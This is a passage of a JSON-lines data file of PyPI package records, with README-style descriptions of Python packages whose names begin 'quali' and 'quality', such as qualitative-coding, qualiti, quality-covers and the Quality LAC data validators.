files:makecheck-codestyleNote:check-codestyleusesisort,blackanddarglintlibraryUpdate all dev libraries to the latest version using one comandmakeupdate-dev-deps4. Code securitymakecheck-safetyThis command launchesPoetryintegrity checks as well as identifies security issues withSafetyandBandit.makecheck-safety5. Type checksRunmypystatic type checkermakemypy6. Tests with coverage badgesRunpytestmaketest7. All lintersOf course there is a command torulerun all linters in one:makelintthe same as:maketest&&makecheck-codestyle&&makemypy&&makecheck-safety8. 
Dockermakedocker-buildwhich is equivalent to:makedocker-buildVERSION=latestRemove docker image withmakedocker-removeMore informationabout docker.9. CleanupDelete pycache filesmakepycache-removeRemove package buildmakebuild-removeDelete .DS_STORE filesmakedsstore-removeRemove .mypycachemakemypycache-removeOr to remove all above run:makecleanup\ud83d\udcc8 ReleasesYou can see the list of available releases on theGitHub Releasespage.We followSemantic Versionsspecification.We useRelease Drafter. As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you\u2019re ready. With the categories option, you can categorize pull requests in release notes using labels.List of labels and corresponding titlesLabelTitle in Releasesenhancement,feature\ud83d\ude80 Featuresbug,refactoring,bugfix,fix\ud83d\udd27 Fixes & Refactoringbuild,ci,testing\ud83d\udce6 Build System & CI/CDbreaking\ud83d\udca5 Breaking Changesdocumentation\ud83d\udcdd Documentationdependencies\u2b06\ufe0f Dependencies updatesYou can update it inrelease-drafter.yml.GitHub creates thebug,enhancement, anddocumentationlabels for you. Dependabot creates thedependencieslabel. Create the remaining labels on the Issues tab of your GitHub repository, when you need them.\ud83d\udee1 LicenseThis project is licensed under the terms of theMITlicense. SeeLICENSEfor more details.\ud83d\udcc3 Citation@misc{qualifire,author={qualifire-dev},title={Qualifire PYthon SDK},year={2023},publisher={GitHub},journal={GitHub repository},howpublished={\\url{https://github.com/qualifire-dev/qualifire}}}CreditsThis project was generated withpython-package-template"} +{"package": "qualifyzedatautils", "pacakge-description": "No description available on PyPI."} +{"package": "qualifyzetest", "pacakge-description": "No description available on PyPI."} +{"package": "qualimens", "pacakge-description": "No description available on PyPI."} +{"package": "qualipy", "pacakge-description": "QualiPyQualiPy is a framework for assisting with the automated testing process. Qualipy is not meant to replace pytest, behave, or other testing frameworks. Instead, it is meant to augment the process to provider further automation. It can be configured based on the needs of the project and the availablility of other technologies.QualiPy features include:Exporting feature files from JIRA for progression and regression testingUploading test results to JIRASupport for custom project management, authentication, and testing pluginsComing Soon:Moving user stories based on the outcome of the testsLoading test data to be used during the testing processCleaning up the test data after the testing has completedData management across steps and scenariosTest PluginsQualiPy is built to use multiple testing frameworks via plugins. Currently, QualiPy supports the behave framework out of the box for business-driven development.Project Management PluginsLike the testing plugins, QualiPy can also use multiple project management software suites (such as JIRA) via plugins.AuthenticationIn most cases, authentication needs to happen in order to interact with project management software suites. This interaction can use certificates, API keys, or simple username/password combinations. The difficult part is how to secure the credentials. 
For starters, a keyring authenticator is implemented that just uses the keyring functionality for the underlying OS.Initial SetupIn order to test using JIRA, you must have a running JIRA instance.Create a test project that uses behave to run tests from feature filesCreate and activate a virtual environment (optional)Install QualiPy (pip install qualipy)Execute QualiPy (python -m qualipy)QualiPy looks forqualipy.yamlin the current directory. If that is not found, then default configuration settings are used. Additionally, other YAML config files can be used by including the--config-filecommand line argument.QualiPy assumes that the feature files are located in thefeaturesdirectory in the current working directory. This can be changed with the--features-dircommand line argument."} +{"package": "qualisicherung", "pacakge-description": "Add a short description here!DescriptionA longer description of your project goes here\u2026NoteThis project has been set up using PyScaffold 3.2.3. For details and usage\ninformation on PyScaffold seehttps://pyscaffold.org/."} +{"package": "qualisys", "pacakge-description": "Load data from a .txt file exported from QTM intopandas:pip install qualisysIn[1]:fromqualisysimportload_qtm_dataIn[2]:data,metadata=load_qtm_data('example_data.txt')In[3]:metadataOut[3]:{'analog_frequency':0,'description':'--','events':[],'no_of_frames':720,'pc_on_time':912.56663253,'no_of_cameras':7,'marker_names':['RIGHT_KNEE','right_ankle'],'frequency':120,'no_of_markers':2,'no_of_analog':0,'data_included':'3D','time_stamp':numpy.datetime64('2014-06-17T08:53:44-0400')}In[4]:dataOut[4]:Dimensions:2(items)x720(major_axis)x3(minor_axis)Itemsaxis:RIGHT_KNEEtoright_ankleMajor_axisaxis:0.00833to6.0Minor_axisaxis:xtozIn[5]:data['right_ankle'].head()Out[5]:dimxyzt0.008331501.1022073.985102.8150.016671501.1872074.183103.0580.025001501.0522073.905102.7750.033331501.5572073.970103.1950.041671501.4252073.629102.974"} +{"package": "qualitative-coding", "pacakge-description": "Qualitative CodingQualitative coding for computer scientists.Qualitative coding is a form of feature extraction in which text (or images,\nvideo, etc.) is tagged with features of interest. Sometimes the codebook is\ndefined ahead of time, other times it emerges through multiple rounds of coding.\nFor more on how and why to use qualitative coding, see Emerson, Fretz, and\nShaw'sWriting Ethnographic Fieldnotesor Shaffer'sQuantitative\nEthnography.Most of the tools available for qualitative coding and subsequent analysis were\ndesigned for non-programmers. They are GUI-based, proprietary, and don't expose\nthe data in well-structured ways. Concepts from computer science, such as trees,\nsorting, and filtering, could also be applied to qualitative coding analysis if\nthe interface supported it. Furthermore, a command-line based tool can be\ncombined with other utilities into flexible pipelines.Qualitative Coding, orqc, was designed to address these issues. I have usedqcas a primary coding tool in aSIGCSE\npaperon\npackaging and releasing a stable version was my own dissertation work.qcis in active use on forthcoming publications and receives regular updates\nas we need new features.LimitationsDue to its nature as a command-line program,qcis only well-suited to coding textual data.qcuses line numbers as a fundamental unit. Therefore, it requires text files in your corpus to be\nhard-wrapped at 80 characters. 
Thecorpus importtask can handle this for you.Coding is done in a two-column view in a variety of supported editors, including\nVisual Studio Code, vim, and emacs. If you are not used to using a text editor,\nor if you prefer a more graphical coding experience,qcmight not be the best option.Installationpip install qualitative-codingSetupChoose a working directory for your project. Runqc init -y. This will createsettings.yamlwith the default settings, and set up the required files\nand directories for you. (Visual Studio Code is the default editor.)UsageWorkflowqcis designed to give you a powerful terminal-based interface. The general\nworkflow is to usecodeto apply qualitative codes to your text files. As you\ngo, you will start to have ideas about the meanings and organization of your\ncodes. Usememoto capture these.Once you finish a round of coding, it's time to reorganize your codes. Editcodebook.yaml, grouping the flat list of codes into a hierarchy.\nUsecodes statsto see the distribution of your codes.\nUsecodes renameif you want to rename existing codes.After you finish coding, you may want to use your codes for analysis. Tools\nare provided for viewing statistics, cross-tabulation, and examples of codes,\nwith many options for selecting and filtering at various units of analysis.\nResults can be exported to CSV for downstream analysis.The--coderargument supports keeping track of multiple coders on a project,\nand there are options to filter on coder where relevant. More analytical tools,\nsuch as inter-rater reliability, are coming.TutorialCreate a new directory somewhere. We will create a virtual environment, intstallqc, and download some sample text from Wikipedia.$ python3 -m venv env\n$ source env/bin/activate\n$ pip install qualitative-coding\n$ qc init -y\n$ curl -o what_is_coding.txt \"https://en.wikipedia.org/w/index.php?title=Coding_%28social_sciences%29&action=raw\"\n$ qc corpus import what_is_coding.txtNow we're ready to start coding. This next command will open a split-window session in\nyour editor of choice; add comma-separated codes to the blank file on the right.\nOnce you've added some codes, we can analyze and refine them.$ qc code chris\n$ qc codebook\n$ qc codes list\n- a_priori\n- analysis\n- coding_process\n- computers\n- errors\n- grounded_coding\n- themesNow that we have coded our corpus (consisting of a single document), we should\nthink about whether these codes have any structure. Re-organize some of your\ncodes incodebook.yaml. When you finish, runcodebookagain. It will go\nthrough your corpus and add any missing codes.$ qc codes list\n- analysis\n- coding_process\n - a_priori\n - grounded_coding\n- computers\n- errors\n- themesI decided to group a priori coding and grounded coding together under coding\nprocess. Let's see some statistics on the codes:$ qc codes stats\nCode Count\n------------------ -------\nanalysis 2\ncoding_process 7\n. a_priori 2\n. grounded_coding 2\ncomputers 2\nerrors 1\nthemes 2statshas lots of useful filtering and formatting options. For example,qc codes stats --pattern wiki --depth 1 --min 10 --format latexwould only consider files\nhaving \"wiki\" in the filename. Within these files, it would show only\ntop-level categories of codes having at least ten instances, and would output a\ntable suitable for inclusion in a LaTeX document. 
Use--helpon any command to\nsee available options.Next, we might want to see examples of what we have coded.$ qc codes find analysis\nShowing results for codes: analysis\n\nwhat_is_coding.txt (2)\n================================================================================\n\n[0:3]\nIn the [[social science|social sciences]], '''coding''' is an analytical process | analysis\nin which data, in both [[quantitative research|quantitative]] form (such as | \n[[questionnaire]]s results) or [[qualitative research|qualitative]] form (such | \n\n[52:57]\nprocess of selecting core thematic categories present in several documents to | \ndiscover common patterns and relations.Grbich, Carol. (2013). \"Qualitative | \nData Analysis\" (2nd ed.). The Flinders University of South Australia: SAGE | analysis\nPublications Ltd. | \n |Again, there are lots of options for filtering and viewing your coding. At some\npoint, you will probably want to revise your codes. You can easily rename a\ncode, or collapse codes together, with therenamecommand. This updates your\ncodebook as well as in all your code files.$ qc codes rename grounded_coding groundedAt this point, you are starting to realize some of the deeper themes running\nthrough your corpus. Capturing these in an \"integrative memo\" is an important\npart of qualitative coding.memowill open a preformatted document for you in vim.$ qc memo chris --message \"Thoughts on coding process\"Congratulations! You have finished the first round of coding. Before you move\non, this would be an excellent time to check your files into version control.\nI hope you findqcto be powerful and efficient; it's worked for me!-Chris ProctorCommandsUse--helpfor a full list of available options for each command.initInitializes a new coding project. Ifsettings.yamlis missing, writes the settings\nfile with default values. Make any desired edits, and then runqc initagain.\nYou can skip this step by passing--accept-defaults(-y) to the first\ninvocation ofqc init. It is safe to re-runqc init.$ qc initcheckChecks that all required files and directories are in place.$ qc checkcodeOpens a split-screen vim window with a corpus file and the corresponding code\nfile. The name of the coder is a required positional argument.\nAfter optionally filtering using common options (below), select a document with\nno existing codes (for this coder) using--first(-1) or--random(-r)$ qc code chris -1Save and close your editor when you finish. In the unlikely event that your editor\ncrashes or your battery dies before you finish coding, your saved changes are\npersisted incodes.txt. Runqc code --recoverto resume the coding session.codebook (cb)Ensures that all codes in the project are included in the codebook. (New codes are\nadded automatically, but if you accidentally delete some while editing the codebook,qc codebookwill replace them.)$ qc codebookcodersList all coders in the current project.memoOpens your default editor to write a memo, optionally passing--message(-m)\nas the title of the memo. Use--list(-l) to list all memos.$ qc memo -m \"It's all starting to make sense...\"upgradeUpgrade aqcproject from a prior version ofqc.versionShow the current version ofqc.Corpus commandsThe following commands are grouped underqc corpus.corpus listList all files in the corpus.corpus importImport files into the corpus, copying source files intocorpus, formatting them\n(see options), and registering them in the database. 
Individual files can be imported,\nor directories can be recursively imported using--recursive(-r).$ qc corpus import transcripts --recursiveIf you want to import files into a specific subdirectory within thecorpus, use--corpus-root(-c). For example, if you wanted to import an additional\ntranscript after importing the transcripts directory, you could run:$ qc corpus import follow_up.txt --corpus-root transcriptsSeveral importers are available to format files, and can be specified using--importer(-i). The default importer,pandoc, usesPandocto convert files into plain-text, and then hard-wrap\nthem at 80 characters.verbatimimports text files without making any changes.\nFuture importers will include text extraction from PDFs and automatic transcription of\naudio files.Codes commandsThe following commands are grouped underqc code.codes list (ls)Lists all the codes currently in the codebook.$ qc list --expandedcodes renameGoes through all the code files and replaces one or more codes with another.\nRemoves the old codes from the codebook.$ qc rename humorous funy funnny funnycodes findDisplays all occurences of the provided code(s).$ qc find math science artcodes statsDisplays frequency of usage for each code. Note that counts include all usages of children.\nList code names to show only certain codes. In addition to the common options below,\ncode results can be filtered with--max, and--min.$qc stats --recursive-codes --depth 2codes crosstab (ct)Displays a cross-tabulation of code co-occurrence within the unit of analysis,\nas counts or as probabilities (--probs,-0). Optionally use a compact\n(--compact,-z) output format to display more columns.\nIn the future, this may also include odds ratios.$qc crosstab planning implementation evaluation --recursive-codes --depth 1 --probsCommon OptionsFiltering the corpus--patternpattern(-p): Only include corpus files and their codes which match\n(glob-style)pattern.--filenamesfilepath(-f): Only include corpus files listed infilepath(one per line).Filtering code selectioncode[codes]: Many commands have an optional positional argument in which\nyou may list codes to consider. If none are given, the root node in the tree\nof codes is assumed.--codercoder(-c): Only include codes entered bycoder(if you\nuse different names for different rounds of coding, you can also use this to\nfilter by round of coding).--recursive-codes(-r): Include children of selected codes.--depthdepth(-d): Limit the recursive depth of codes to select.--unitunit(-n): Unit of analysis for reporting. Currently\n\"line\", \"paragraph\", and \"document\" are supported. Paragraphs are delimted\nby blank lines.--recursive-counts(-a): When counting codes, also count instances of\ncodes' children. In contrast to--recursive-codes, which controls which\ncodes will be reported, this option controls how the counting is done.Output and formatting--formatformat(-m): Formatting style for output table. Supported\nvalues include \"html\", \"latex\", \"github\", andmany more.--expanded(-e): Show names of codes in expanded form (e.g.\n\"coding_process:grounded\")--outfileoutfile(-o): Save tabular results to a csv file instead\nof displaying."} +{"package": "quali-testing-helpers", "pacakge-description": "UNKNOWN"} +{"package": "qualiti", "pacakge-description": "Qualiti.ai Python Tools and Package\ud83d\udd17 Qualiti.aiis a very powerful paid platform. 
This repo is calledqualitibut is a free, open-source Python Package and Command Line Interface (CLI) for you to build your own automated pipelines using AI and see examples of what can be done with AI.This package provides easy-to-use tools that can benefit developers and testers! Just take a look below to see what's available.RequirementsInstallationToolsConfigurationAttributerRequirements\ud83d\udc0d Python3.8.12or higher\ud83d\udce6Poetryas package manager if you are contributingHaving access to both allows you to use all features and examples, so note which you'll need:\ud83d\udd11 Access toOpenAIvia API Key\ud83d\udd11 Access to\ud83e\udd17 HuggingFacevia Access TokenInstallationThis project currently supports these models and providers, but you must have access to them:OpenAI (gpt-3.5-turbois the default model)Installqualitiwith your favorite package manager:pipinstallqualitiSet up the model and/or provider you want to use.OpenAISet yourOPENAI_API_KEYEnvironment Variable. You can use thequaliti set-envcommand if needed:qualiticonfset-envOPENAI_API_KEY\ud83d\udca1 You can also use a.envfile or manage Environment Variables your own way! Use theexample.envtemplate as an example\ud83e\udd17 HuggingFaceSet yourHUGGINGFACE_ACCESS_TOKENEnvironment Variable. You can use thequaliti set-envcommand if needed:qualiticonfset-envHUGGINGFACE_ACCESS_TOKEN\ud83d\udca1 Make sure tosourcethe config file or restart the Terminal to register the changesThen start usingqualitiin the CLI or as a package in your project:qualiti--helpfromqualitiimportaiPROMPT=\"\"\"Write a one-sentence greeting as a{0}\"\"\"openai_response=ai.get_completion(PROMPT.format(\"pirate\"))ConfigurationThis tool allows you to Set and Get key-value pairs in your Environment Variables or thequaliti.conf.json.\ud83d\udca1 This is shown in Step 2 of theInstallationsectionUsagequaliticonf[COMMAND][OPTIONS]ExamplesThis is helpful if you know that your elements are in specific files. 
This makes tools likeAttributerfaster and cheaper since the AI will only look at files that you care about.For example, in Angular, you may know that your HTML only exists in these file patterns:*.component.ts*.component.htmlWe can set theGLOB_PATTERNvalue to only look for component files.qualiticonfset-confGLOB_PATTERN\"*.component.*\"\ud83d\udca1 See the Pythonglob and fnmatchdocs for details on how to create glob patternsAttributerUse AI to auto-adddata-testidattributes to HTML code.\ud83e\udd16 Usagequalitiattrtestid[PATH][OPTIONS]\ud83d\udca1 You can enter a path to a single file or to a directory.IfPATHis a directory, it will recursively look forall supported filesin that directory and its subdirectories.Seequaliti.conf.jsonfor the default supported file types \ud83d\udc40You can update this list usingset-conf:qualiticonfset-confSUPPORTED_FILES\"[.html, .tsx]\"Examples:# filequalitiattrtestidexamples/StoryView.tsx# directoryqualitiattrtestidexamples/SubComponents\ud83e\udd15 ProblemAlthough it's \"best practice\" for Web Pages to have dedicated attributes for Test Automation and Accessibility (a11y), it seems to be an afterthought and is not commonly followed.\u274c This makes the websiteinaccessiblefor a large group of people (ie screen readers, keyboard navigation)\u274c This makes it difficult to design and create Test Automation for the UI (ie component, end-to-end)Ideally, developers would design their UI and components with these attributes in mindas they codesince adding them is simple -- especially with a properDesign System-- but imagine a developer inheriting an existing project because they're a new hire, moving teams, or jumping into a project to help out. Spending the time and energy to do all of this manually isn't as simple:Find the appropriate files (could be dozens or hundreds!)Locate the relevant elements in each fileAdd these attributes with helpful names for each element\u2705 SolutionUsing AI, we can do all 3 steps automatically!Provide the file(s) like afilename.tsxor a folder like/ComponentsAI adds adata-testidto each relevant elementThe new file is saved and can now be compared to the original in case the dev wants to make any changes\ud83d\udca1 Theoretically, this approach should work for any Web Framework like Angular, React, Vue, etc!\ud83d\udcad ConsiderationsSeeattributer.pyfor the prompt and commands used.OpenAI ain't free, so be cognizant of how many files you target since each file will invoke the AIUsegitso you get a diff before you push the updated files."} +{"package": "qualitube", "pacakge-description": "No description available on PyPI."} +{"package": "quality", "pacakge-description": "No description available on PyPI."} +{"package": "quality-assurance-data", "pacakge-description": "quality-assurance-dataQuality Assurance data and machine learning version 0.0.1Quality assurance (QA) data and machine learning are essential components in the development and maintenance of machine learning models, particularly in open-source projects hosted on platforms like GitHub. Quality assurance in this context refers to the process of ensuring that the data used to train, validate, and test machine learning models meets specific quality standards. This is crucial in order to build models that are accurate, reliable, and robust.Here are some key aspects to consider when dealing with quality assurance data in machine learning projects:Data collection and preprocessing:Ensure that the data collected is representative of the problem you're trying to solve. 
Be mindful of potential biases and avoid using low-quality or irrelevant data. Preprocessing involves cleaning, transforming, and normalizing the data so that it's suitable for training machine learning models.Data labeling:In supervised learning, data labeling is a critical step that involves annotating the input data with corresponding output labels. It's important to maintain high-quality labels, as incorrect or inconsistent labeling can lead to poor model performance. In open-source projects, data labeling might involve collaboration among multiple contributors, so establishing clear guidelines and maintaining consistency is key.Data splitting:Split your dataset into training, validation, and test sets to evaluate the performance of your model. This allows you to assess how well the model generalizes to unseen data and helps prevent overfitting.Feature engineering:Select the most relevant features or create new ones to improve the performance of your model. This process can be iterative and requires a deep understanding of the problem domain.Model evaluation:Use appropriate evaluation metrics to measure the performance of your machine learning model. This will help you identify potential issues and areas for improvement. In open-source projects, it's helpful to set up automated pipelines for model evaluation to ensure consistent quality.Continuous improvement and monitoring:Continuously monitor the performance of your model, particularly when new data becomes available. Regularly retrain your model and update it to maintain its performance and relevance. In a GitHub context, this might involve using tools like GitHub Actions to automate the process.Documentation and transparency:Proper documentation is crucial for open-source projects. Ensure that the process of data collection, preprocessing, labeling, and model training is well-documented so that others can understand, contribute to, and replicate your work.In summary, quality assurance data is vital for the success of machine learning projects, especially in open-source environments like GitHub. Ensuring high-quality data and following best practices can lead to more accurate and reliable machine learning models."} +{"package": "quality-checks", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quality-control", "pacakge-description": "Quality ControlComing Soon"} +{"package": "quality-covers", "pacakge-description": "Quality coversQuality covers is a pattern mining algorithm.Installpip3install--upgradequality_coversTransactional fileIf your file looks like thischess.dat:1 3 5 7 10 \n1 3 5 7 10 \n1 3 5 8 9 \n1 3 6 7 9 \n1 3 6 8 9orP30968\nP48551 P17181\nP05121 Q03405 P00747 P02671\nQ02643\nP48551 P17181useimportquality_coversquality_covers.run_classic_size(\"chess.dat\",False)Binary fileIf your file looks like thischess.data:1 0 1 0 1 0 1 0 0 1\n1 0 1 0 1 0 1 0 0 1\n1 0 1 0 1 0 0 1 1 0\n1 0 1 0 0 1 1 0 1 0\n1 0 1 0 0 1 0 1 1 0useimportquality_coversquality_covers.run_classic_size(\"chess.data\",True)Output of the functionsThe functions will create two files in current directory:chess.data.out: the result filechess.data.clock: information about time executionExtract binary matricesYou can obtain binary matrices by callingextract_binary_matriceson the output filequality_covers.extract_binary_matrices('chess.data.out')Optional argumentsThreshold coverageYou can provide a threshold to the coverage.# 60% of coveragequality_covers.run_classic_size(\"chess.data\",True,0.6)MeasuresYou can also ask for information about measures:frequencymonocleseparationobject uniformityquality_covers.run_classic_size(\"chess.data\",True,0.6,True)3,4,9 ; 4,5,6,7,8#Object Uniformity=0.81944; Monocole=91.00000; Frequency=0.33333; Separation=0.48387\n2,9 ; 1,3,7#Object Uniformity=0.68750; Monocole=28.00000; Frequency=0.22222; Separation=0.27273\n1,6,9 ; 2,7#Object Uniformity=0.63889; Monocole=28.00000; Frequency=0.33333; Separation=0.31579\n# Mandatory: 0\n# Non-mandatory: 3\n# Total: 3\n# Coverage: 25/38(65.78947%)\n# Mean frequency: 0.29630\n# Mean monocole: 49.00000\n# Mean object uniformity: 0.71528\n# Mean separation: 0.35746Different algorithmsThere are currently four different algorithms:run_classic_sizerun_approximate_sizerun_fca_cemb_with_mandatoryrun_fca_cemb_without_mandatoryExamplesTransactional file with 80% coverage and measures information with approximate size algorithmData file1 3 5 7 10 \n1 3 5 7 10 \n1 3 5 8 9 \n1 3 6 7 9 \n1 3 6 8 9 \n1 4 5 7 10 \n1 4 5 7 10 \n1 4 5 8 9 \n1 4 6 7 9 \n1 4 6 8 9 \n2 3 5 7 10 \n2 3 5 7 10 \n2 3 5 8 9 \n2 3 6 7 9 \n2 3 6 8 9 \n2 4 5 7 10 \n2 4 5 7 10 \n2 4 5 8 9 \n2 4 6 7 9 \n2 4 6 8 9Python commandsimportquality_coversquality_covers.run_approximate_size(file.data', True, 0.8, True)Results file.data.out1,2,6,7,11,12,16,17 ; 5,7,10#Object Uniformity=0.60000; Monocle=648.00000; Frequency=0.40000; Separation=0.50000\n4,5,9,10,14,15,19,20 ; 9,6#Object Uniformity=0.40000; Monocle=352.00000; Frequency=0.40000; Separation=0.36364\n3,5,8,10,13,15,18,20 ; 8,9#Object Uniformity=0.40000; Monocle=352.00000; Frequency=0.40000; Separation=0.36364\n11,12,13,14,15,16,17,18,19,20 ; 2#Object Uniformity=0.20000; Monocle=228.00000; Frequency=0.50000; Separation=0.20000\n6,7,8,9,10,16,17,18,19,20 ; 4#Object Uniformity=0.20000; Monocle=258.00000; Frequency=0.50000; Separation=0.20000\n1,2,3,4,5,11,12,13,14,15 ; 3#Object Uniformity=0.20000; Monocle=258.00000; Frequency=0.50000; Separation=0.20000\n# Mandatory: 0\n# Non-mandatory: 6\n# Total: 6\n# Coverage: 82/100(82.00000%)\n# Mean frequency: 0.45000\n# Mean monocle: 349.33334\n# Mean object uniformity: 0.33333\n# Mean separation: 0.30455Extract binary matricesimportquality_coversquality_covers.extract_binary_matrices('file.data.out')Result binary matrices extent1 0 0 0 0 1\n1 0 0 0 0 1\n0 0 1 
0 0 1\n0 1 0 0 0 1\n0 1 1 0 0 1\n1 0 0 0 1 0\n1 0 0 0 1 0\n0 0 1 0 1 0\n0 1 0 0 1 0\n0 1 1 0 1 0\n1 0 0 1 0 1\n1 0 0 1 0 1\n0 0 1 1 0 1\n0 1 0 1 0 1\n0 1 1 1 0 1\n1 0 0 1 1 0\n1 0 0 1 1 0\n0 0 1 1 1 0\n0 1 0 1 1 0\n0 1 1 1 1 0Result binary matrices extentThe first line is the name of the column5 7 10 9 6 8 2 4 3\n1 1 1 0 0 0 0 0 0\n0 0 0 1 1 0 0 0 0\n0 0 0 1 0 1 0 0 0\n0 0 0 0 0 0 1 0 0\n0 0 0 0 0 0 0 1 0\n0 0 0 0 0 0 0 0 1More infoPaper associatedTo comeResearch labhttp://www.ciad-lab.fr/More tools about association ruleshttps://marm.checksem.fr/api/ui/https://app.marm.checksem.fr/https://quality-cover.checksem.fr/api/uiAuthorsAmira Mouakher (amira.mouakher@u-bourgogne.fr)\nNicolas Gros (nicolas.gros01@u-bourgogne.fr)\nSebastien Gerin (sebastien.gerin@sayens.fr)"} +{"package": "quality-estimation", "pacakge-description": "quality-estimation"} +{"package": "qualityface", "pacakge-description": "Quality Face model which decides how suitable of an input face for face recognition system"} +{"package": "qualityforward", "pacakge-description": "This is python library for QualityForward API. QualityForward is cloud based test management service."} +{"package": "quality-lac-data-ref-authorities", "pacakge-description": "Quality LAC Data Reference - Local Authority DataThis is a redistribution of the ONS dataset onLower Tier Local Authority to\nUpper Tier Local Authority (April 2021) Lookup in England and Walesshaped\nto be used in the Quality Lac Data project.This repository contains pypi and npm distributions of\nsubsets of this dataset as well as the scripts to\ngenerate them from source.Source: Office for National Statistics licensed under the Open Government Licence v.3.0Read more about this dataset here:https://geoportal.statistics.gov.uk/datasets/ons::lower-tier-local-authority-to-upper-tier-local-authority-april-2021-lookup-in-england-and-wales/aboutRegular updatesWhen a new authority distribution is available, download it and add it to the source folder and\nat the same time delete the existing file from this location. There can only be one file\nin the source folder at a time.After updating the sources, run the script found inbin/generate-output-files.pyto\nregenerate the output file.Commit everything to GitHub. If ready to make a release, make sure to update the version inpyproject.toml, push to GitHub and then create a GitHub release. TheGitHub Actionwill then create the distribution files and\nupload toPyPI.Release naming should follow a pseudo-semantic versioningformat:... Alpha and beta releases can be flagged by appending-alpha.and-beta..For example, the April 2021 release is named2021.4with the associated tagv2021.4."} +{"package": "quality-lac-data-ref-postcodes", "pacakge-description": "Quality LAC Data Reference - PostcodesThis is a redistribution of theONS Postcode Directoryshaped\nto be used in the Quality Lac Data project.This repository contains PyPI and npm distributions of\nsubsets of this dataset as well as the scripts to\ngenerate them from source.Source: Office for National Statistics licensed under the Open Government Licence v.3.0Read more about this dataset here:https://geoportal.statistidcs.gov.uk/datasets/ons::ons-postcode-directory-august-2021/aboutTo keep distribution small, only pickled dataframes compatible\nwith pandas 1.0.5 are included. This will hopefully change\nonce we figure out how to do different versions as extras.As pickle is inherently unsafe, the SHA-512 checksum for each file\nis included inhashes.txt. 
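The signing of hashes.txt is covered in the next sentences; purely to illustrate the checksum step itself, a minimal sketch of checking a pickled file against a SHA-512 digest before unpickling could look like the code below. The file names and the assumed one-digest-per-line layout of hashes.txt are illustrative guesses, not the package's actual interface.

```python
import hashlib
import pickle
from pathlib import Path


def sha512_of(path: Path) -> str:
    """Return the hex SHA-512 digest of a file, read in chunks."""
    digest = hashlib.sha512()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def load_verified_pickle(data_file: Path, hashes_file: Path):
    """Unpickle data_file only if its digest matches the entry in hashes_file.

    Assumes one '<hex digest>  <filename>' line per file, which is an
    illustrative convention rather than the real hashes.txt layout.
    """
    expected = {}
    for line in hashes_file.read_text().splitlines():
        digest, _, name = line.strip().partition("  ")
        if name:
            expected[name] = digest
    if expected.get(data_file.name) != sha512_of(data_file):
        raise ValueError(f"Checksum mismatch for {data_file.name}; refusing to unpickle")
    with data_file.open("rb") as fh:
        return pickle.load(fh)
```

Verifying the digest first keeps pickle.load from ever touching a tampered file; the signature on hashes.txt itself, described next, is what protects the digests from being swapped out.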
This\nfile is signed withthis key.When downloading from PyPI, specify the environment variableQLACREF_PC_KEYto either be the public key itself, or a path\nto where it can be loaded from. The checksums are then verified\nand each file checked before unpickling.Regular updatesWhen a new postcode distribution is available, download it and add it to the source folder and\nat the same time delete the existing file from this location. There can only be one file\nin the source folder at a time.After updating the postcode sources, run the script found inbin/generate-output-files.pyto\nregenerate the output files for each letter of the alphabet. These end up in the\nqlacref_postcodes directory.To sign the postcodes, you need the distribution private key. Run the scriptbin/sign-files.pyto\ncreate the signed checksum file.Commit everything to GitHub. If ready to make a release, make sure to update the version inpyproject.toml, push to GitHub and then create a GitHub release. TheGitHub Actionwill then create the distribution files and\nupload toPyPI.Release naming should follow a pseudo-semantic versioningformat:... Alpha and beta releases can be flagged by appending-alpha.and-beta..For example, the August 2021 release is named2021.8with the associated tagv2021.8."} +{"package": "quality-lac-data-validator", "pacakge-description": "Quality LAC data beta: Python validatorWe want to build a tool that improves the quality of data on Looked After Children so that Children\u2019s Services Departments have all the information needed to enhance their services.We believe that a tool that highlights and helps fixing data errors would be valuable for:Reducing the time analysts, business support and social workers spend cleaning data.Enabling leadership to better use evidence in supporting Looked After Children.About this projectThe aim of this project is to deliver a tool to relieve some of the pain-points\nofreporting and qualityin children's services data. This project\nfocuses, in particular, on data on looked after children (LAC) and theSSDA903return.The project consists of a number of related pieces of work:Hosted ToolReact & Pyodie Front-EndPython Validator Engine & Rules[this repo]Local Authority Reference DataPostcode Reference DataThe core parts consist of aPythonvalidator engine and rules usingPandaswithPoetryfor dependency management. The tool is targeted\nto run either standalone, or inpyodidein the browser for a zero-install\ndeployment with offline capabilities.It provides methods of finding the validation errors defined by the DfE in 903 data.\nThe validator needs to be provided with a set of input files for the current year and,\noptionally, the previous year. These files are coerced into a common format and sent to\neach of the validator rules in turn. 
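In rough outline, that dispatch step (handing the same coerced tables to every rule in turn and collecting what each one flags) might be sketched as below; every name here is assumed for illustration and is not taken from the package itself.

```python
from typing import Callable, Dict, List, Mapping

import pandas as pd

# A rule receives every coerced table keyed by name and returns, per table,
# the index labels of rows it flags. Plain functions are assumed so that
# rule.__name__ is available for the report key.
Rule = Callable[[Mapping[str, pd.DataFrame]], Dict[str, List[int]]]


def run_rules(dfs: Mapping[str, pd.DataFrame],
              rules: List[Rule]) -> Dict[str, Dict[str, List[int]]]:
    """Hand the same tables to each rule in turn and gather its findings."""
    report: Dict[str, Dict[str, List[int]]] = {}
    for rule in rules:
        report[rule.__name__] = rule(dfs)
    return report
```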
The validators report on rows not meeting the rules\nand a report is provided highlight errors for each row and which fields were included in\nthe checks.Data pipelineLoading of filesIdentification of tables - currently matched onexactfilenameConversion of CSV to tabular format -no type checkingEnrichment of provided data with Postcode distancesEvaluation of rulesReportProject StructureThese are the key filesproject\n\u251c\u2500\u2500\u2500 pyproject.toml - Project details and dependencies\n\u251c\u2500\u2500\u2500 validator903\n\u2502 \u251c\u2500\u2500\u2500 config.py - High-level configuration\n\u2502 \u251c\u2500\u2500\u2500 ingress.py - Data ingress (handling CSV and XML files)\n\u2502 \u251c\u2500\u2500\u2500 types.py - Classes used across the work\n\u2502 \u251c\u2500\u2500\u2500 validator.py - The core validator process\n\u2502 \u2514\u2500\u2500\u2500 validators.py - All individual validator codes\n\u2514\u2500\u2500\u2500 tests - Unit testsMost of the work from contributors will be invalidators.pyand the associated testing files under\ntests. Please do not submit a pull-request without a comprehensive test.DevelopmentTo install the code and dependencies, from the main project directory run:poetry installIf this does not work, it might be because you're running the wrong version of Python, the version of Numpy used by the 903 validator is locked at 3.9. The devcontainer and dockerfile should ensure you are running 3.9 and you may simply require a rebuild. If not, ensure you are working in an environment or venv with Python 3.9 